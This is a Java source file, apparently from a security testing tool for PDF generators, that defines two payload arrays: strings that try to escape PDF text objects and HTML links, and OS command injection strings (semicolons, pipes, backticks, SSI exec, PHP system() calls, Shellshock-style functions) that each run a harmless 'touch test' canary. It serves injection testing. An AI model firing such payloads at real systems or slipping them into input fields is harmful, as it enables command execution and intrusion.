package csec.pla.PDFBox;

public class Payloads {

    public static String[] escape_seq = {
        // OBJECT ESCAPE
        "hacker\\",
        "hacker)",
        "hacker\\\\)",
        "hacker\\\\",
        "hacker\u00E2\u009C\u0094",
        "hacker\u00F0\u009F\u008D\u00A3",
        "hacker\u00E2\u0098\u00BA",
        "hacker\u00E2\u009D\u00A4",
        "hacker\u00F0\u009F\u008C\u00B8",
        "hacker&rpar;",
        "hacker&#41;",
        "hacker&bsol;",
        "hacker&#92;",
        "hacker󶶜",
        "hacker✓",
        "hackerܮ",
        "hacker ܏ ",
        "hackerܢ ",
        " hacker© ",
        "hacker Ʃ ",
        "hacker⩾",
        "hackerΩ",
        "hackerω",
        "hacker💩",
        "hackerỨ",
        "hackerứ",
        "hacker↩",
        "hackerÉ",
        "hackeré",
        "hacker𝐩",
        "hacker𝑩",
        "hacker𐩥",
        "hackerʩ",
        "hacker⍩",
        "hacker🀩",
        "hacker𐢩",
        "hacker╩",
        "hacker%%EOF",
        "hacker\u0000",
        "hacker	",
        "hacker\u000C",
        // Text Object Escape
        "hacker\\)] TJ ET\nendstream",
        "hacker\\\\)] TJ ET\nendstream",
        "hacker\\)] TJ ET\nendstream",
        "hacker󶶜] TJ ET\nendstream",
        "hacker󶶜] TJ ET\nendstream",
        "hacker✓] TJ ET\nendstream",
        "hacker✓] TJ ET\nendstream",
        "hackerܮ] TJ ET\nendstream",
        "hackerܮ] TJ ET\nendstream",
        "hacker ܏ ] TJ ET\nendstream",
        "hacker ܏ ] TJ ET\nendstream",
        "hackerܢ ] TJ ET\nendstream",
        "hackerܢ ] TJ ET\nendstream",
        "hacker)] TJ ET\nendstream",
        "hacker©] TJ ET\nendstream",
        "hackerƩ] TJ ET\nendstream",
        "hacker⩾] TJ ET\nendstream",
        "hackerΩ] TJ ET\nendstream",
        "hackerω] TJ ET\nendstream",
        "hacker💩] TJ ET\nendstream",
        "hackerỨ] TJ ET\nendstream",
        "hackerứ] TJ ET\nendstream",
        "hacker↩] TJ ET\nendstream",
        "hackerÉ] TJ ET\nendstream",
        "hackeré] TJ ET\nendstream",
        "hacker𝐩] TJ ET\nendstream",
        "hacker𝑩] TJ ET\nendstream",
        "hacker𐩥] TJ ET\nendstream",
        "hackerʩ] TJ ET\nendstream",
        "hacker⍩] TJ ET\nendstream",
        "hacker🀩] TJ ET\nendstream",
        "hacker𐢩] TJ ET\nendstream",
        "hacker╩] TJ ET\nendstream",
        "hacker%%EOF)] TJ ET\nendstream",
        "hacker\u0000)] TJ ET\nendstream",
        "hacker	)] TJ ET\nendstream",
        "hacker\u000C)] TJ ET\nendstream",
        // HTML ESCAPE (Target links)
        "a href='hacker\\'>hacker\\</a>",
        "a href='hacker)'>hacker)</a>",
        "<a href='hacker\\)'>hacker\\)</a>",
        "<a href='hacker\\\\'>hacker\\\\</a>",
        "<a href='hacker\u00E2\u009C\u0094'>hacker\u00E2\u009C\u0094</a>",
        "<a href='hacker\u00F0\u009F\u008D\u00A3'>hacker\u00F0\u009F\u008D\u00A3</a>",
        "<a href='hacker\u00E2\u0098\u00BA'>hacker\u00E2\u0098\u00BA</a>",
        "<a href='hacker\u00E2\u009D\u00A4'>hacker\u00E2\u009D\u00A4</a>",
        "<a href='hacker\u00F0\u009F\u008C\u00B8'>hacker\u00F0\u009F\u008C\u00B8</a>",
        "<a href='hacker&rpar;'>hacker&rpar;</a>",
        "<a href='hacker&#41;'>hacker&#41;</a>",
        "<a href='hacker&bsol;'>hacker&bsol;</a>",
        "<a href='hacker&#92;'>hacker&#92;</a>",
        "<a href='hacker󶶜'>hacker󶶜</a>",
        "<a href='hacker✓'>hacker✓</a>",
        "<a href='hackerܮ'>hackerܮ</a>",
        "<a href='hacker ܏ '>hacker ܏ </a>",
        "<a href='hackerܢ '>hackerܢ </a>",
        "<a href='hacker©'>hacker©</a>",
        "<a href='hacker Ʃ'>hacker Ʃ</a>",
        "<a href='hacker⩾'>hacker⩾</a>",
        "<a href='hackerΩ'>hackerΩ</a>",
        "<a href='hackerω'>hackerω</a>",
        "<a href='hacker💩'>hacker💩</a>",
        "<a href='hackerỨ'>hackerỨ</a>",
        "<a href='hackerứ'>hackerứ</a>",
        "<a href='hacker↩'>hacker↩</a>",
        "<a href='hackerÉ'>hackerÉ</a>",
        "<a href='hackeré'>hackeré</a>",
        "<a href='hacker𝐩'>hacker𝐩</a>",
        "<a href='hacker𝑩'>hacker𝑩</a>",
        "<a href='hacker𐩥'>hacker𐩥</a>",
        "<a href='hackerʩ'>hackerʩ</a>",
        "<a href='hacker⍩'>hacker⍩</a>",
        "<a href='hacker🀩'>hacker🀩</a>",
        "<a href='hacker𐢩'>hacker𐢩</a>",
        "<a href='hacker╩'>hacker╩</a>",
        "<a href='hacker%%EOF'>hacker%%EOF</a>",
        "<a href='hacker\u0000'>hacker\u0000</a>",
        "<a href='hacker	'>hacker	</a>",
        "<a href='hacker\u000C'>hacker\u000C</a>"
    };

    public static String[] os_commands = {
        "touch test",
        " touch test",
        ";touch test;",
        "; touch test;",
        ";touch test",
        "; touch test",
        ";system('touch test')",
        "; system('touch test')",
        "|touch test",
        "| touch test",
        "|touch test;",
        "| touch test;",
        "&& touch test",
        " && touch test",
        "a && touch test",
        "a && touch test;",
        "1 && touch test",
        "1 && touch test;",
        "1' && touch test",
        "1' && touch test;",
        "1' && touch test#",
        "a' && touch test",
        "a' && touch test;",
        "a' && touch test#",
        "1\" && touch test",
        "1\" && touch test;",
        "1\" && touch test#",
        "a\" && touch test",
        "a\" && touch test;",
        "a\" && touch test#",
        "& touch test",
        " & touch test",
        "`touch test`",
        "`touch test`",
        "a);touch test",
        "a;touch test",
        "a);touch test;",
        "a;touch test;",
        "a);touch test|",
        "a;touch test|",
        "a)|touch test",
        "a|touch test",
        "a)|touch test;",
        "a|touch test",
        "&lt;!--#exec%20cmd=&quot;touch%20test&quot;--&gt;",
        "&lt;!--#exec%20cmd=&quot;touch%20test;--&gt;",
        "%0Atouch%20test",
        "%0Atouch%20test%0A",
        "$;touch test",
        "() { :;}; bash -c 'sleep 100 && touch test'",
        "() { :;}; bash -c 'touch test'",
        "$(`touch test`)",
        "<!--#exec cmd='touch test';-->",
        "<?php system('touch test');?>",
        "touch test #",
        "touch test#",
        " touch test #",
        " touch test#"
    };
}
